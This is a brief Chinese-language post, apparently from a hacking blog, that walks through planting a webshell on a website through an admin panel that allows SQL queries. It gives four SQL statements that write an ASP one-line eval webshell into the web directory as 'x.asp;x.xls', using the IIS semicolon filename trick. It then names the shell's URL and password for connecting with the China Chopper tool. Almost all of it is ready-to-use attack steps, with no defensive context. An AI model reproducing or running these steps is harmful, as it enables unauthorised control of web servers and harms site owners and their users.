今天，朋友给了一个比较好玩的后台
 
有SQL查询功能
 
 
 
在后台的主页，或者备份什么的，可以得到网站的物理路径，这里我没有传马，直接点击了备份数据库，重点是得到物理路径，后台主页，或者各种爆物理路径，还要看运气和自由发挥了
 
以下拿webshell步骤
 
      第一句代码
 
 
create table cmd (a varchar(50))
　　第二句代码
 
 
insert into cmd (a) values ('<%eval request("yun")%>')
　　第三句代码
 
select * into [a] in 'd:\wwwroot\wjqcad\admin163\Databackup\x.asp;x.xls' 'excel 4.0;' from cmd
　　第四句代码
 
 
drop table cmd
直接菜刀里连接http://www.2cto.com /x.asp;x.xls一句话  密码是yun